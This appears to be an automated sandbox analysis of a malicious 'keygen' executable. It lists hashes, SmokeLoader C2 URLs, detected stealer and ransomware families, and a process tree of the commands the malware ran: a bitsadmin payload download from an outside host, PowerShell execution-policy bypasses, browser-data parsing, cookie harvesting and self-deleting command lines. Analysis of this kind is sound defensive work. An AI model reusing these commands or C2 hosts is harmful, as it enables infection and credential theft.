Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    256s
  • max time network
    261s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    30-04-2021 01:38

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

rc4.i32
rc4.i32

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 48 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:872
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1224
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:1204
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:532
      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
        1⤵
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
            3⤵
            • Loads dropped DLL
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1996
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1908
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1088
          • C:\Users\Admin\AppData\Local\Temp\is-IN4CL.tmp\Install.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-IN4CL.tmp\Install.tmp" /SL5="$3017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1572
            • C:\Users\Admin\AppData\Local\Temp\is-RUGN0.tmp\Ultra.exe
              "C:\Users\Admin\AppData\Local\Temp\is-RUGN0.tmp\Ultra.exe" /S /UID=burnerch1
              4⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Modifies system certificate store
              • Suspicious use of WriteProcessMemory
              PID:1648
              • C:\Program Files\Reference Assemblies\OOEJUTXVAN\ultramediaburner.exe
                "C:\Program Files\Reference Assemblies\OOEJUTXVAN\ultramediaburner.exe" /VERYSILENT
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2016
                • C:\Users\Admin\AppData\Local\Temp\is-DD7TP.tmp\ultramediaburner.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-DD7TP.tmp\ultramediaburner.tmp" /SL5="$20188,281924,62464,C:\Program Files\Reference Assemblies\OOEJUTXVAN\ultramediaburner.exe" /VERYSILENT
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:1300
                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                    7⤵
                    • Executes dropped EXE
                    PID:572
              • C:\Users\Admin\AppData\Local\Temp\ba-b5332-a05-fcca3-9147c203035a5\SHacocaecaevu.exe
                "C:\Users\Admin\AppData\Local\Temp\ba-b5332-a05-fcca3-9147c203035a5\SHacocaecaevu.exe"
                5⤵
                • Executes dropped EXE
                PID:900
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  PID:1500
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:2
                    7⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:1744
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:406530 /prefetch:2
                    7⤵
                    • Modifies Internet Explorer settings
                    • NTFS ADS
                    • Suspicious use of SetWindowsHookEx
                    PID:2184
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:340994 /prefetch:2
                    7⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:2652
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 1440
                      8⤵
                      • Program crash
                      • Suspicious behavior: GetForegroundWindowSpam
                      PID:2824
              • C:\Users\Admin\AppData\Local\Temp\a0-feea0-4c2-96f83-6f3e5f1f7a762\Bisydylafy.exe
                "C:\Users\Admin\AppData\Local\Temp\a0-feea0-4c2-96f83-6f3e5f1f7a762\Bisydylafy.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:564
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqz1zw43.fvl\skipper.exe /s & exit
                  6⤵
                    PID:1672
                    • C:\Users\Admin\AppData\Local\Temp\aqz1zw43.fvl\skipper.exe
                      C:\Users\Admin\AppData\Local\Temp\aqz1zw43.fvl\skipper.exe /s
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:844
                      • C:\Users\Admin\AppData\Local\Temp\551347867.exe
                        C:\Users\Admin\AppData\Local\Temp\551347867.exe
                        8⤵
                        • Executes dropped EXE
                        PID:2616
                      • C:\Users\Admin\AppData\Local\Temp\1043672191.exe
                        C:\Users\Admin\AppData\Local\Temp\1043672191.exe
                        8⤵
                        • Executes dropped EXE
                        PID:3012
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\aqz1zw43.fvl\skipper.exe & exit
                        8⤵
                          PID:2372
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 0
                            9⤵
                            • Runs ping.exe
                            PID:1344
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42hxtpge.cs3\KiffMainE1.exe & exit
                      6⤵
                        PID:1792
                        • C:\Users\Admin\AppData\Local\Temp\42hxtpge.cs3\KiffMainE1.exe
                          C:\Users\Admin\AppData\Local\Temp\42hxtpge.cs3\KiffMainE1.exe
                          7⤵
                          • Executes dropped EXE
                          PID:1404
                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                            dw20.exe -x -s 528
                            8⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:2680
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z0vyrawr.t45\001.exe & exit
                        6⤵
                          PID:2512
                          • C:\Users\Admin\AppData\Local\Temp\z0vyrawr.t45\001.exe
                            C:\Users\Admin\AppData\Local\Temp\z0vyrawr.t45\001.exe
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2600
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v2c11vvb.bgu\gpooe.exe & exit
                          6⤵
                            PID:2328
                            • C:\Users\Admin\AppData\Local\Temp\v2c11vvb.bgu\gpooe.exe
                              C:\Users\Admin\AppData\Local\Temp\v2c11vvb.bgu\gpooe.exe
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Modifies system certificate store
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:3060
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:2112
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:3056
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\31xrwdte.ghp\google-game.exe & exit
                            6⤵
                              PID:2724
                              • C:\Users\Admin\AppData\Local\Temp\31xrwdte.ghp\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\31xrwdte.ghp\google-game.exe
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:2768
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                  8⤵
                                    PID:2808
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cs4dcpii.uii\md2_2efs.exe & exit
                                6⤵
                                  PID:2968
                                  • C:\Users\Admin\AppData\Local\Temp\cs4dcpii.uii\md2_2efs.exe
                                    C:\Users\Admin\AppData\Local\Temp\cs4dcpii.uii\md2_2efs.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:3036
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5vbaepv.mjp\askinstall39.exe & exit
                                  6⤵
                                    PID:2508
                                    • C:\Users\Admin\AppData\Local\Temp\u5vbaepv.mjp\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\u5vbaepv.mjp\askinstall39.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2712
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        8⤵
                                          PID:2868
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            9⤵
                                            • Kills process with taskkill
                                            PID:1696
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r1jmdies.yt2\GcleanerWW.exe /mixone & exit
                                      6⤵
                                        PID:1064
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2v22fu2.kl4\005.exe & exit
                                        6⤵
                                          PID:340
                                          • C:\Users\Admin\AppData\Local\Temp\r2v22fu2.kl4\005.exe
                                            C:\Users\Admin\AppData\Local\Temp\r2v22fu2.kl4\005.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:1056
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uqhnzihg.ymm\requête.exe & exit
                                          6⤵
                                            PID:2748
                                            • C:\Users\Admin\AppData\Local\Temp\uqhnzihg.ymm\requête.exe
                                              C:\Users\Admin\AppData\Local\Temp\uqhnzihg.ymm\requête.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:1740
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:2072
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b firefox
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2268
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b chrome
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:764
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b edge
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2112
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjebdqyt.trm\SunLabsPlayer.exe /S & exit
                                            6⤵
                                              PID:2764
                                              • C:\Users\Admin\AppData\Local\Temp\rjebdqyt.trm\SunLabsPlayer.exe
                                                C:\Users\Admin\AppData\Local\Temp\rjebdqyt.trm\SunLabsPlayer.exe /S
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2632
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:1112
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:2844
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2372
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2740
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Drops file in Program Files directory
                                                          PID:340
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Drops file in Program Files directory
                                                          PID:844
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Checks for any installed AV software in registry
                                                          PID:2756
                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                          8⤵
                                                          • Download via BitsAdmin
                                                          PID:1208
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pm41rFFPNGEiWs1M -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2248
                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnhgw2LnfuFKyg3t -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2788
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1056
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:3056
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:2740
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2936
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2708
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiE236.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:2544
                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:2112
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jxkqa311.i5s\6d3ab8a7.exe & exit
                                                                  6⤵
                                                                    PID:2388
                                                                    • C:\Users\Admin\AppData\Local\Temp\jxkqa311.i5s\6d3ab8a7.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jxkqa311.i5s\6d3ab8a7.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2832
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5lfjrepa.4te\app.exe /8-2222 & exit
                                                                    6⤵
                                                                      PID:2628
                                                                      • C:\Users\Admin\AppData\Local\Temp\5lfjrepa.4te\app.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\5lfjrepa.4te\app.exe /8-2222
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                        PID:2056
                                                                        • C:\Users\Admin\AppData\Local\Temp\5lfjrepa.4te\app.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\5lfjrepa.4te\app.exe" /8-2222
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:2416
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:896
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                3⤵
                                                                  PID:2100
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 127.0.0.1
                                                                    4⤵
                                                                    • Runs ping.exe
                                                                    PID:2144
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:2368
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Adds Run key to start application
                                                                PID:2880
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:2908
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2280
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "247736927-1473311934-21100655904456508261448480106-1692651462107636969-443473407"
                                                              1⤵
                                                              • Loads dropped DLL
                                                              • Modifies registry class
                                                              PID:2808
                                                            • C:\Users\Admin\AppData\Local\Temp\E965.exe
                                                              C:\Users\Admin\AppData\Local\Temp\E965.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:1156
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Users\Admin\AppData\Local\ebda2757-6887-48e0-8768-e129de76781c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                2⤵
                                                                • Modifies file permissions
                                                                PID:2316
                                                              • C:\Users\Admin\AppData\Local\Temp\E965.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\E965.exe" --Admin IsNotAutoStart IsNotTask
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:1192
                                                                • C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin1.exe
                                                                  "C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin1.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:2136
                                                                  • C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin1.exe
                                                                    "C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin1.exe" --Admin
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:2416
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                                                      5⤵
                                                                        PID:3056
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                                                                        5⤵
                                                                          PID:3052
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
